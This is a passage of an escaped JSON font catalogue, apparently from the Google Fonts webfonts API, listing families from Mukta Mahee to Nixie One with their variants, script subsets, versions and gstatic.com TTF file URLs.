\"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mukta Mahee\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"gurmukhi\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/muktamahee/v15/XRXN3IOIi0hcP8iVU67hA9MFcBoHJndqZCsW.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/muktamahee/v15/XRXN3IOIi0hcP8iVU67hA9NhcxoHJndqZCsW.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/muktamahee/v15/XRXQ3IOIi0hcP8iVU67hA-vNWz4PDWtj.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/muktamahee/v15/XRXN3IOIi0hcP8iVU67hA9M5choHJndqZCsW.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/muktamahee/v15/XRXN3IOIi0hcP8iVU67hA9MVdRoHJndqZCsW.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/muktamahee/v15/XRXN3IOIi0hcP8iVU67hA9NxdBoHJndqZCsW.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/muktamahee/v15/XRXN3IOIi0hcP8iVU67hA9NtdxoHJndqZCsW.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mukta Malar\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tamil\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/muktamalar/v12/MCoKzAXyz8LOE2FpJMxZqIMwBtAB62ruoAZW.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/muktamalar/v12/MCoKzAXyz8LOE2FpJMxZqINUBdAB62ruoAZW.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/muktamalar/v12/MCoXzAXyz8LOE2FpJMxZqLv4LfQJwHbn.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/muktamalar/v12/MCoKzAXyz8LOE2FpJMxZqIMMBNAB62ruoAZW.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/muktamalar/v12/MCoKzAXyz8LOE2FpJMxZqIMgA9AB62ruoAZW.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/muktamalar/v12/MCoKzAXyz8LOE2FpJMxZqINEAtAB62ruoAZW.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/muktamalar/v12/MCoKzAXyz8LOE2FpJMxZqINYAdAB62ruoAZW.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mukta Vaani\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"gujarati\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/muktavaani/v13/3JnkSD_-ynaxmxnEfVHPIGXNV8BD-u97MW1a.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/muktavaani/v13/3JnkSD_-ynaxmxnEfVHPIGWpVMBD-u97MW1a.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/muktavaani/v13/3Jn5SD_-ynaxmxnEfVHPIF0FfORL0fNy.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/muktavaani/v13/3JnkSD_-ynaxmxnEfVHPIGXxVcBD-u97MW1a.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/muktavaani/v13/3JnkSD_-ynaxmxnEfVHPIGXdUsBD-u97MW1a.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/muktavaani/v13/3JnkSD_-ynaxmxnEfVHPIGW5U8BD-u97MW1a.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/muktavaani/v13/3JnkSD_-ynaxmxnEfVHPIGWlUMBD-u97MW1a.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mulish\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/mulish/v12/1Ptyg83HX_SGhgqO0yLcmjzUAuWexRNRwaClGrw-PTY.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/mulish/v12/1Ptyg83HX_SGhgqO0yLcmjzUAuWexc1RwaClGrw-PTY.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/mulish/v12/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNRwaClGrw-PTY.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/mulish/v12/1Ptyg83HX_SGhgqO0yLcmjzUAuWexaFRwaClGrw-PTY.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/mulish/v12/1Ptyg83HX_SGhgqO0yLcmjzUAuWexU1WwaClGrw-PTY.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/mulish/v12/1Ptyg83HX_SGhgqO0yLcmjzUAuWexXRWwaClGrw-PTY.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/mulish/v12/1Ptyg83HX_SGhgqO0yLcmjzUAuWexRNWwaClGrw-PTY.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/mulish/v12/1Ptyg83HX_SGhgqO0yLcmjzUAuWexTpWwaClGrw-PTY.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/mulish/v12/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSqeOvHp47LTZFwA.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/mulish/v12/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSd-OvHp47LTZFwA.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/mulish/v12/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSKeOvHp47LTZFwA.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/mulish/v12/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSG-OvHp47LTZFwA.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/mulish/v12/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsS9-SvHp47LTZFwA.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/mulish/v12/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSzuSvHp47LTZFwA.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/mulish/v12/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSqeSvHp47LTZFwA.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/mulish/v12/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSgOSvHp47LTZFwA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Murecho\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v6\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/murecho/v6/q5uYsoq3NOBn_I-ggCJg98TBOoNFCMpr5HWZLCpUOaM6.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/murecho/v6/q5uYsoq3NOBn_I-ggCJg98TBOoNFCMrr5XWZLCpUOaM6.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/murecho/v6/q5uYsoq3NOBn_I-ggCJg98TBOoNFCMo15XWZLCpUOaM6.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/murecho/v6/q5uYsoq3NOBn_I-ggCJg98TBOoNFCMpr5XWZLCpUOaM6.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/murecho/v6/q5uYsoq3NOBn_I-ggCJg98TBOoNFCMpZ5XWZLCpUOaM6.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/murecho/v6/q5uYsoq3NOBn_I-ggCJg98TBOoNFCMq14nWZLCpUOaM6.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/murecho/v6/q5uYsoq3NOBn_I-ggCJg98TBOoNFCMqM4nWZLCpUOaM6.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/murecho/v6/q5uYsoq3NOBn_I-ggCJg98TBOoNFCMrr4nWZLCpUOaM6.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/murecho/v6/q5uYsoq3NOBn_I-ggCJg98TBOoNFCMrC4nWZLCpUOaM6.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"MuseoModerno\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/museomoderno/v22/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMlZFuewajeKlCdo.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/museomoderno/v22/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMtZEuewajeKlCdo.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/museomoderno/v22/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMghEuewajeKlCdo.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/museomoderno/v22/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMlZEuewajeKlCdo.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/museomoderno/v22/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMmREuewajeKlCdo.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/museomoderno/v22/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMohDuewajeKlCdo.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/museomoderno/v22/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMrFDuewajeKlCdo.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/museomoderno/v22/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMtZDuewajeKlCdo.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/museomoderno/v22/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMv9DuewajeKlCdo.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/museomoderno/v22/zrfx0HnU0_7wWdMrFcWqSEXlXhPlgPcSP5dZJ54HUa4QicCgGdrS3g.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/museomoderno/v22/zrfx0HnU0_7wWdMrFcWqSEXlXhPlgPcSP5dZJ54H0a8QicCgGdrS3g.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/museomoderno/v22/zrfx0HnU0_7wWdMrFcWqSEXlXhPlgPcSP5dZJ54HD68QicCgGdrS3g.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/museomoderno/v22/zrfx0HnU0_7wWdMrFcWqSEXlXhPlgPcSP5dZJ54HUa8QicCgGdrS3g.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/museomoderno/v22/zrfx0HnU0_7wWdMrFcWqSEXlXhPlgPcSP5dZJ54HY68QicCgGdrS3g.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/museomoderno/v22/zrfx0HnU0_7wWdMrFcWqSEXlXhPlgPcSP5dZJ54Hj6gQicCgGdrS3g.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/museomoderno/v22/zrfx0HnU0_7wWdMrFcWqSEXlXhPlgPcSP5dZJ54HtqgQicCgGdrS3g.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/museomoderno/v22/zrfx0HnU0_7wWdMrFcWqSEXlXhPlgPcSP5dZJ54H0agQicCgGdrS3g.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/museomoderno/v22/zrfx0HnU0_7wWdMrFcWqSEXlXhPlgPcSP5dZJ54H-KgQicCgGdrS3g.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"My Soul\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mysoul/v2/3XFqErcuy945_u6KF_Ulk2nnXf0.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mystery Quest\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mysteryquest/v20/-nF6OG414u0E6k0wynSGlujRHwElD_9Qz9E.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"NTR\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"telugu\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ntr/v15/RLpzK5Xy0ZjiGGhs5TA4bg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nabla\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"math\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/nabla/v9/j8_D6-LI0Lvpe7Makz5UhJt9C3uqg_X_75gyGS4jAxsNIjrRNRBUFFR_198.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nanum Brush Script\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/nanumbrushscript/v22/wXK2E2wfpokopxzthSqPbcR5_gVaxazyjqBr1lO97Q.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nanum Gothic\",\n      \"variants\": [\n        \"regular\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/nanumgothic/v21/PN_3Rfi-oW3hYwmKDpxS7F_z_tLfxno73g.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/nanumgothic/v21/PN_oRfi-oW3hYwmKDpxS7F_LQv37zlEn14YEUQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/nanumgothic/v21/PN_oRfi-oW3hYwmKDpxS7F_LXv77zlEn14YEUQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nanum Gothic Coding\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/nanumgothiccoding/v19/8QIVdjzHisX_8vv59_xMxtPFW4IXROwsy6QxVs1X7tc.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/nanumgothiccoding/v19/8QIYdjzHisX_8vv59_xMxtPFW4IXROws8xgecsV88t5V9r4.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nanum Myeongjo\",\n      \"variants\": [\n        \"regular\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/nanummyeongjo/v20/9Btx3DZF0dXLMZlywRbVRNhxy1LreHQ8juyl.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/nanummyeongjo/v20/9Bty3DZF0dXLMZlywRbVRNhxy2pXV1A0pfCs5Kos.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/nanummyeongjo/v20/9Bty3DZF0dXLMZlywRbVRNhxy2pLVFA0pfCs5Kos.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nanum Pen Script\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/nanumpenscript/v19/daaDSSYiLGqEal3MvdA_FOL_3FkN2z7-aMFCcTU.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Neonderthaw\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/neonderthaw/v3/Iure6Yx5-oWVZI0r-17AeZZJprVA4XQ0.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nerko One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/nerkoone/v15/m8JQjfZSc7OXlB3ZMOjzcJ5BZmqa3A.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Neucha\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/neucha/v17/q5uGsou0JOdh94bvugNsCxVEgA.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Neuton\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/neuton/v18/UMBQrPtMoH62xUZKAKkfegD5Drog6Q.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/neuton/v18/UMBQrPtMoH62xUZKZKofegD5Drog6Q.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/neuton/v18/UMBTrPtMoH62xUZyyII7civlBw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/neuton/v18/UMBRrPtMoH62xUZCyog_UC71B6M5.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/neuton/v18/UMBQrPtMoH62xUZKdK0fegD5Drog6Q.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/neuton/v18/UMBQrPtMoH62xUZKaK4fegD5Drog6Q.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"New Rocker\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/newrocker/v16/MwQzbhjp3-HImzcCU_cJkGMViblPtXs.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"New Tegomin\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/newtegomin/v10/SLXMc1fV7Gd9USdBAfPlqfN0Q3ptkDMN.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"News Cycle\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/newscycle/v22/CSR64z1Qlv-GDxkbKVQ_TOcATNt_pOU.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/newscycle/v22/CSR54z1Qlv-GDxkbKVQ_dFsvaNNUuOwkC2s.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Newsreader\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/newsreader/v19/cY9qfjOCX1hbuyalUrK49dLac06G1ZGsZBtoBCzBDXXD9JVF438w-I_ADOxEPjCggA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/newsreader/v19/cY9qfjOCX1hbuyalUrK49dLac06G1ZGsZBtoBCzBDXXD9JVF438wJo_ADOxEPjCggA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/newsreader/v19/cY9qfjOCX1hbuyalUrK49dLac06G1ZGsZBtoBCzBDXXD9JVF438weI_ADOxEPjCggA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/newsreader/v19/cY9qfjOCX1hbuyalUrK49dLac06G1ZGsZBtoBCzBDXXD9JVF438wSo_ADOxEPjCggA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/newsreader/v19/cY9qfjOCX1hbuyalUrK49dLac06G1ZGsZBtoBCzBDXXD9JVF438wpojADOxEPjCggA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/newsreader/v19/cY9qfjOCX1hbuyalUrK49dLac06G1ZGsZBtoBCzBDXXD9JVF438wn4jADOxEPjCggA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/newsreader/v19/cY9qfjOCX1hbuyalUrK49dLac06G1ZGsZBtoBCzBDXXD9JVF438w-IjADOxEPjCggA.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/newsreader/v19/cY9kfjOCX1hbuyalUrK439vogqC9yFZCYg7oRZaLP4obnf7fTXglsMyoT-ZAHDWwgECi.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/newsreader/v19/cY9kfjOCX1hbuyalUrK439vogqC9yFZCYg7oRZaLP4obnf7fTXglsMx2T-ZAHDWwgECi.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/newsreader/v19/cY9kfjOCX1hbuyalUrK439vogqC9yFZCYg7oRZaLP4obnf7fTXglsMwoT-ZAHDWwgECi.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/newsreader/v19/cY9kfjOCX1hbuyalUrK439vogqC9yFZCYg7oRZaLP4obnf7fTXglsMwaT-ZAHDWwgECi.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/newsreader/v19/cY9kfjOCX1hbuyalUrK439vogqC9yFZCYg7oRZaLP4obnf7fTXglsMz2SOZAHDWwgECi.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/newsreader/v19/cY9kfjOCX1hbuyalUrK439vogqC9yFZCYg7oRZaLP4obnf7fTXglsMzPSOZAHDWwgECi.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/newsreader/v19/cY9kfjOCX1hbuyalUrK439vogqC9yFZCYg7oRZaLP4obnf7fTXglsMyoSOZAHDWwgECi.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Niconne\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/niconne/v15/w8gaH2QvRug1_rTfrQut2F4OuOo.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Niramit\",\n      \"variants\": [\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/niramit/v10/I_urMpWdvgLdNxVLVXx7tiiEr5_BdZ8.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/niramit/v10/I_upMpWdvgLdNxVLXbZiXimOq73EZZ_f6w.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/niramit/v10/I_urMpWdvgLdNxVLVRh4tiiEr5_BdZ8.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/niramit/v10/I_upMpWdvgLdNxVLXbZiOiqOq73EZZ_f6w.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/niramit/v10/I_uuMpWdvgLdNxVLbbRQkiCvs5Y.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/niramit/v10/I_usMpWdvgLdNxVLXbZalgKqo5bYbA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/niramit/v10/I_urMpWdvgLdNxVLVUB5tiiEr5_BdZ8.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/niramit/v10/I_upMpWdvgLdNxVLXbZiYiuOq73EZZ_f6w.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/niramit/v10/I_urMpWdvgLdNxVLVWx-tiiEr5_BdZ8.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/niramit/v10/I_upMpWdvgLdNxVLXbZiTiyOq73EZZ_f6w.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/niramit/v10/I_urMpWdvgLdNxVLVQh_tiiEr5_BdZ8.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/niramit/v10/I_upMpWdvgLdNxVLXbZiKi2Oq73EZZ_f6w.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nixie One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        